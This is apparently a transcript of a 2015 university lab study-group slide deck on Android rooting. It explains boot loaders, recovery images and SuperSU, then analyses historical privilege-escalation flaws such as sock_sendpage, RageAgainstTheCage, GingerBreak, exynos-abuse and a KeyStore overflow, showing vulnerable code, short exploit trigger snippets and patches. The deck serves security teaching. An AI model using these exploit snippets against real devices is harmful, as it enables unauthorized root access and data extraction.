Rooting Your Device

Transcript

1. ANSR Lab Group Study Roo ng Your Device Bob Mingshen

   Sun September 14, 2015

2. PhD Comics

3. None

4. Outline 1 What? 2 Why? 3 How? 4 HOW???!!! Bob

   Mingshen Sun ANSR Lab Group Study September 14, 2015 4 / 54

5. What? rooting the process of gaining super user privileges on

   an Anroid device super user account is called root has rights and permissions over all files and programs on a UNIX-based system full control over the operating system Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 5 / 54

6. Why? access or alter system files to change a hard-coded

   configuration or behavior modify the look and feel with custom themes or boot animations uninstall pre-installed applications, system backups and restores root apps: iptables-based firewalls, ad-blockers, overclocking audit the security of an Android device without being confined by UNIX permissions Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 6 / 54

7. Why? — Examples Advanced Power Menu+ (APM+) Bob Mingshen Sun

   ANSR Lab Group Study September 14, 2015 7 / 54

8. Why? — Examples Fake address of Wechat’s “Moments”. Bob Mingshen

   Sun ANSR Lab Group Study September 14, 2015 8 / 54

9. Why? — Examples Xblast Bob Mingshen Sun ANSR Lab Group

   Study September 14, 2015 9 / 54

10. Why? — Examples Xblast You can choose your favorite color

    for your Clock with out modifying APK files You can add custom text along with the clock, which will be displayed in status bar and notification bar You can add color to Date field in notification bar... You can choose your favorite font for clock & Date field in status bar & notification bar... You can add your favorite fonts into your /sdcard/fonts/ folder, it will be listed in the app You can add bar code fonts for clock & Date field in status bar & notification bar.. You can add shadow and color for clock and custom text as you like You can choose any color for status bar... You can make full transparent for notification Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 10 / 54

11. Why? — Examples iPhone Jailbreak Bob Mingshen Sun ANSR Lab

    Group Study September 14, 2015 11 / 54

12. Why not? compromise the security protection all user data is

    exposed to applications that have been granted proot premissions extract all data from the device Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 12 / 54

13. How? Bob Mingshen Sun ANSR Lab Group Study September 14,

    2015 13 / 54

14. How? Bob Mingshen Sun ANSR Lab Group Study September 14,

    2015 14 / 54

15. HOW???!!! — SU https://github.com/ChainsDD/su-binary/blob/master/su.c static void allow(const struct su_context *ctx)

    { // ... if (seteuid(0)) { PLOGE("seteuid (root)"); exit(EXIT_FAILURE); } populate_environment(ctx); if (setresgid(ctx->to.uid, ctx->to.uid, ctx->to.uid)) { PLOGE("setresgid (%u)", ctx->to.uid); exit(EXIT_FAILURE); } if (setresuid(ctx->to.uid, ctx->to.uid, ctx->to.uid)) { PLOGE("setresuid (%u)", ctx->to.uid); exit(EXIT_FAILURE); } // ... execv(ctx->to.shell, ctx->to.argv + argc); } Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 15 / 54

16. HOW???!!! — Objec ve Copy su binary into /system/bin or

    /system/xbin directory. Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 16 / 54

17. Understanding the Par on Layout boot loader: boot loader program,

    initialize the hardware, boot the kernel splash: first splash screen boot: boot image, Linux kernel (zImage) system the root file system ram disk (initrd) recovery: minimal Android boot image system: /system, framework, libraries, binaries, pre-installed applications userdata: /data, app data, pictures, videos cache radio Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 17 / 54

18. Understanding the Boot Process boot loader manufacturer’s proprietary code takes

    care of low-level hardware initialization (clocks, RAM, media) provides support for loading recovery images putting the phone into download mode Android kernel memory, I/O, memory protections, interrupt handlers, the CPU scheduler, device drivers, and finally mounts the root file system and starts the first user-space process init init.rc start some core Android services such as rild for telephony and mtpd for VPN access Zygote, Dalvik VM and System Server Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 18 / 54

19. Accessing Download Mode download mode enables the user to update

    the persistent storage at a low level flashing process via fastboot protocol, a proprietary protocol, or both these protocols facilitate executing various tasks including fashing NAND partitions, rebooting the device, downloading and executing an alternate kernel image, etc Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 19 / 54

20. Locked and Unlocked Boot Loaders locked boot loaders prevent the

    end user from performing modifications to the device’s firmware unlocked boot loaders custom kernel, recovery image, or operating system image official mechanism in place that enables owners to unlock fastboot oem unlock HTC Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 20 / 54

21. Locked and Unlocked Boot Loaders security implications all data on

    a device can be recovered by an attacker uploading a custom Android boot image or flashing a custom recovery image Google accounts, documents, contacts, passwords factory data reset Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 21 / 54

22. Stock and Custom Recovery Images recovery system allows software updates

    to replace the entirety of the system software preinstalled on the device without wiping user data used to apply updates downloaded manually or Over-the-Air (OTA) ClockworkMode recovery or TeamWin Recovery Project (TWRP) Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 22 / 54

23. Roo ng with an Unlocked Boot Loader 1 unlock boot

    loader 2 use fastboot to flash customized recovery 3 use coustomized recovery to patch an su into /system/bin directory Chainfire SuperSU recovery provides a graphical prompt each time an application requests root access manage which applications or users should be granted root access automatically Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 23 / 54

24. Chainfire SuperSU cat META-INF/com/google/android/update-binary ui_print "- Mounting /system, /data and

    rootfs" mount /system mount /data mount -o rw,remount /system # <<----------------- mount -o rw,remount /system /system mount -o rw,remount / mount -o rw,remount / / ui_print "- Placing files" mkdir /system/bin/.ext set_perm 0 0 0777 /system/bin/.ext cp_perm 0 0 $SUMOD $BIN/su /system/bin/.ext/.su cp_perm 0 0 $SUMOD $BIN/su /system/xbin/su # <<----------------- cp_perm 0 0 0755 $BIN/su /system/xbin/daemonsu if ($SUGOTE); then cp_perm 0 0 0755 $BIN/su /system/xbin/sugote u:object_r:zygote_exec:s0 cp_perm 0 0 0755 $MKSH /system/xbin/sugote-mksh fi if ($SUPOLICY); then cp_perm 0 0 0755 $BIN/supolicy /system/xbin/supolicy cp_perm 0 0 0644 $BIN/libsupol.so $SYSTEMLIB/libsupol.so Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 24 / 54

25. Roo ng with a Locked Boot Loader Gaining root on

    a booted system soft root get a root shell through an unpatched security flaw vulnerability in the Android kernel vulnerability of a process running as root vulnerable program with the set-uid a symbolic link attack against a file permission bug Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 25 / 54

26. A acks Kernel: Wunderbar/asroot Recovery: Volez Udev: Exploid Adbd: RageAgainstTheCage

    Zygote: Zimperlinch and Zysploit Ashmem: KillingInTheNameOf and psneuter Vold: GingerBreak PowerVR: levitator Libsysutils: zergRush Kernel: mempodroid File Permission and Symbolic Link-related attack Adb restore race condition Exynos4: exxynos-abuse Diag: lit/diaggetroot Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 26 / 54

27. BOB WARNING Pay attention. The following content may contain a

    lot of vulnerable C/C++ code. You may write these vulnerable code in the future. The vulernabilities may cause a considerable damage, even affact the national security.

28. Kernel int socket(int domain, int type, int protocol); The domain

    argument specifies a communication domain; this selects the protocol family which will be used for communication. These families are defined in <sys/socket.h>. The currently understood formats include: Name Purpose Man page AF_UNIX, AF_LOCAL Local communication unix(7) AF_INET IPv4 Internet protocols ip(7) AF_INET6 IPv6 Internet protocols ipv6(7) AF_IPX IPX - Novell protocols AF_NETLINK Kernel user interface device netlink(7) AF_X25 ITU-T X.25 / ISO-8208 protocol x25(7) AF_AX25 Amateur radio AX.25 protocol AF_ATMPVC Access to raw ATM PVCs AF_APPLETALK AppleTalk ddp(7) AF_PACKET Low level packet interface packet(7) Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 28 / 54

29. Kernel 65 struct socket 66 { 67 socket_state state; 68

    69 unsigned long flags; 70 struct proto_ops *ops; 71 struct inode *inode; 72 struct fasync_struct *fasync_list; /* Asynchronous wake u 73 struct file *file; /* File back pointer f 74 struct sock *sk; 75 wait_queue_head_t wait; 76 77 short type; 78 unsigned char passcred; 79 }; Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 29 / 54

30. Kernel 87 struct proto_ops { 88 int family; 89 90

    int (*release) (struct socket *sock); 91 int (*bind) (struct socket *sock, struct sockaddr *umyaddr, 92 int sockaddr_len); 93 int (*connect) (struct socket *sock, struct sockaddr *uservaddr, 94 int sockaddr_len, int flags); 95 int (*socketpair) (struct socket *sock1, struct socket *sock2); 96 int (*accept) (struct socket *sock, struct socket *newsock, 97 int flags); 98 int (*getname) (struct socket *sock, struct sockaddr *uaddr, 99 int *usockaddr_len, int peer); 100 unsigned int (*poll) (struct file *file, struct socket *sock, struct poll_table_struct *wait 101 int (*ioctl) (struct socket *sock, unsigned int cmd, 102 unsigned long arg); 103 int (*listen) (struct socket *sock, int len); 104 int (*shutdown) (struct socket *sock, int flags); 105 int (*setsockopt) (struct socket *sock, int level, int optname, 106 char *optval, int optlen); 107 int (*getsockopt) (struct socket *sock, int level, int optname, 108 char *optval, int *optlen); 109 int (*sendmsg) (struct socket *sock, struct msghdr *m, int total_len, struct scm_cooki 110 int (*recvmsg) (struct socket *sock, struct msghdr *m, int total_len, int flags, struc 111 int (*mmap) (struct file *file, struct socket *sock, struct vm_area_struct * vma); 112 ssize_t (*sendpage) (struct socket *sock, struct page *page, int offset, size_t size, int f 113 }; Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 30 / 54

31. Kernel sendfile - transfer data between file descriptors ssize_t sendfile(int

    out_fd, int in_fd, off_t *offset, size_t count); sendfile() copies data between one file descriptor and another. Because this copying is done within the kernel, sendfile() is more efficient than the combination of read(2) and write(2), which would require transferring data to and from user space Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 31 / 54

32. Kernel What goes wrong? Linux NULL pointer dereference due to

    incorrect proto_ops initializations static ssize_t sock_sendpage(struct file *file, struct page *page, int offset, size_t size, loff_t *ppos, int more) { struct socket *sock; int flags; sock = file->private_data; flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT; if (more) flags |= MSG_MORE; return sock->ops->sendpage(sock, page, offset, size, flags); } Could sock->ops->sendpage be NULL? Yes. PF__PPPOX, PF__BLUETOOH donot impliment sendpage function for their sockets. Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 32 / 54

33. Exploit /* ... */ int fdin = mkstemp(template); int fdout

    = socket(PF_PPPOX, SOCK_DGRAM, 0); unlink(template); ftruncate(fdin, PAGE_SIZE); sendfile(fdout, fdin, NULL, PAGE_SIZE); /* ... */ Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 33 / 54

34. Adbd: RageAgainstTheCage take advantage of RLMIT_NPROC max a value that

    defines how many processes a give UID can have running adb deamon <-> adb server /* run under root privileges */ /* don't listen on a port (default 5037) if running in secure mode */ /* don't run as root if we are running in secure mode */ if (secure) { ... /* then switch user and group to "shell" */ setuid(AID_SHELL); setgid(AID_SHELL); ... } Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 34 / 54

35. Patch and adb.c

36. Adbd: exploit the exploit has to be run throught the

    ADB shell (under shell UID) fork processs until the fork call fails (exceed RLIMIT_NPROC) kill adbd (restart as root again) adbd cannot drop privileges to shell because the process limit Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 36 / 54

37. Vold: GingerBreak vold: volume manger daemon accept message that are

    received from a PF_NETLINK socket execute aritrary code with root privileges Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 37 / 54

38. void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) { int major =

    atoi(evt->findParam("MAJOR")); int minor = atoi(evt->findParam("MINOR")); int part_num; const char *tmp = evt->findParam("PARTN"); if (tmp) { part_num = atoi(tmp); } else { SLOGW("Kernel block uevent missing 'PARTN'"); part_num = 1; } if (part_num > mDiskNumParts) { mDiskNumParts = part_num; } if (major != mDiskMajor) { SLOGE("Partition '%s' has a different major than its disk!", devpa return; } mPartMinors[part_num -1] = minor; // <<---------- // ... }

39. GingerBreak: Exploit exploit work across builds without add shows how

    a negative index can be use .text low high GOT .data −n heap Figure 8-7: Negative GOT index from the heap Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 39 / 54

40. GingerBreak: Exploit overwrite the GOT entry of the strcmp function

    with the address of the system function in libc ASLR send a NETLINK request Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 40 / 54

41. GingerBreak: Patch 278 Chapter 8 ▪ Exploiting User Space Software

    proper check for negative indexes. The following output from gi t diff shows the relevant change. Patch for the Missing Bounds Check in handlePartitionAdded with f3d3ce5 --- a/DirectVolume.cpp +++ b/DirectVolume.cpp @@ -186,6 +186,11 @@ void DirectVolume: :handlePart i t ionAdded (const char *devpath, Net l inkEvent *evt) part_num = 1; } ↓ The missing bounds checks are added here. + if (part_num > MAX_PARTITIONS | | part_num < 1) { + SLOGW("Inval id ' PARTN ' value"); + part_num = 1; + } + if (part_num > mDiskNumParts) { mDiskNumParts = part_num; } This is a classic instance of a write-four primitive. This primitive describes the situation where an attacker-controlled 32-bit value is written to an attacker- Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 41 / 54

42. Exynos4: exynos-abuse /dev/mem is a character device file that is

    an image of the main memory of the computer. It may be used, for example, to examine (and even patch) the system. /dev/exynos-mem Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 42 / 54

43. Linux Kernel and Device Driver features implemented as modules Process

    management Memory management Filesystems Device control Networking Arch- dependent code Memory manager Character devices Network subsystem CPU Memory Concurrency, multitasking Virtual memory Files and dirs: the VFS Kernel subsystems Features implemented Software support Hardware IF drivers Block devices File system types Ttys & device access Connectivity Disks & CDs Consoles, etc. Network interfaces The System Call Interface Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 43 / 54

44. Linux Kernel and Device Driver static const struct memdev {

    const char *name; mode_t mode; const struct file_operations *fops; struct backing_dev_info *dev_info; } devlist[] = { #ifdef CONFIG_DEVMEM [1] = { "mem", 0, &mem_fops, &directly_mappable_cdev_bdi }, #endif #ifdef CONFIG_DEVKMEM [2] = { "kmem", 0, &kmem_fops, &directly_mappable_cdev_bdi }, #endif [3] = { "null", 0666, &null_fops, NULL }, #ifdef CONFIG_DEVPORT [4] = { "port", 0, &port_fops, NULL }, #endif [5] = { "zero", 0666, &zero_fops, &zero_bdi }, [7] = { "full", 0666, &full_fops, NULL }, [8] = { "random", 0666, &random_fops, NULL }, [9] = { "urandom", 0666, &urandom_fops, NULL }, [11] = { "kmsg", 0, &kmsg_fops, NULL }, #ifdef CONFIG_CRASH_DUMP [12] = { "oldmem", 0, &oldmem_fops, NULL }, Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 44 / 54

45. Exynos4: exynos-abuse What goes wrong? #ifdef CONFIG_EXYNOS_MEM [14] = {"exynos-mem",

    S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH, &exynos_mem_fops}, #endif rw-rw-r-- for /dev/exynos-mem /system/lib/hw/camera.smdk4x12.so /system/lib/hw/gralloc.smdk4x12.so /system/lib/libhdmi.so Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 45 / 54

46. Exynos4: exynos-abuse static const struct file_operations exynos_mem_fops = { .open

    = exynos_mem_open, .release = exynos_mem_release, .unlocked_ioctl = exynos_mem_ioctl, .mmap = exynos_mem_mmap, } Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 46 / 54

47. Exynos4: exynos-abuse map kernel memory and changes the format string

    for the function handling /proc/kallsyms parse /proc/kallsyms to find the address of the function to remove permission check and executes the setresuid system call in user space reverse the changes it made to kernel memory and execute a root shell a simple patch could be to set permissions to 0660 or 0600 Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 47 / 54

48. KeyStore Stack Buffer Overflow Figure 1: The KeyStore Service Bob

    Mingshen Sun ANSR Lab Group Study September 14, 2015 48 / 54

49. static ResponseCode get_key_for_name(KeyStore* keyStore, Blob* keyBlob, const Value* keyName, const

    uid_t uid, const BlobType type) { char filename[NAME_MAX]; encode_key_for_uid(filename, uid, keyName); ... static int encode_key_for_uid(char* out, uid_t uid, const Value* key) { int n = snprintf(out, NAME_MAX, "%u_", uid); out += n; return n + encode_key(out, key); } static int encode_key(char* out, const Value* key) { const uint8_t* in = key->value; int length = key->length; for (int i = length; i > 0; --i, ++in, ++out) { if (*in >= '0' && *in <= '~') { *out = *in; } else { *out = '+' + (*in >> 6); *++out = '0' + (*in & 0x3F); ++length; } } *out = '\0';

50. KeyStore Exploit 1 Class keystore = Class.forName (" android.security.KeyStore ");

    2 Method mGetInstance = keystore.getMethod (" getInstance "); 3 Method mGet = keystore.getMethod ("get", String.class ); 4 Object instance = mGetInstance.invoke(null );inf 5 mGet.invoke(instance , 6 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+ 7 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+ 8 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+ 9 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+ 10 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+ 11 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+ 12 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "); Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 50 / 54

51. Summary sources Linux kernel Android userspace Linux device driver written

    by SoC venders method buffer overflow integer overflow use-after-free vulnerability Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 51 / 54

52. Vulnerability Proportion of devices running vulnerable versions of Android Bob

    Mingshen Sun ANSR Lab Group Study September 14, 2015 52 / 54

53. Adver sing Emacs and Spacemacs writing code version control editing

    LaTeX files organizing your life managing email Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 53 / 54

54. References Android Hacker’s Handbook Android Security Internals Linux Device Drivers,

    Third Edition: https://lwn.net/Kernel/LDD3/ Bob Mingshen Sun ANSR Lab Group Study September 14, 2015 54 / 54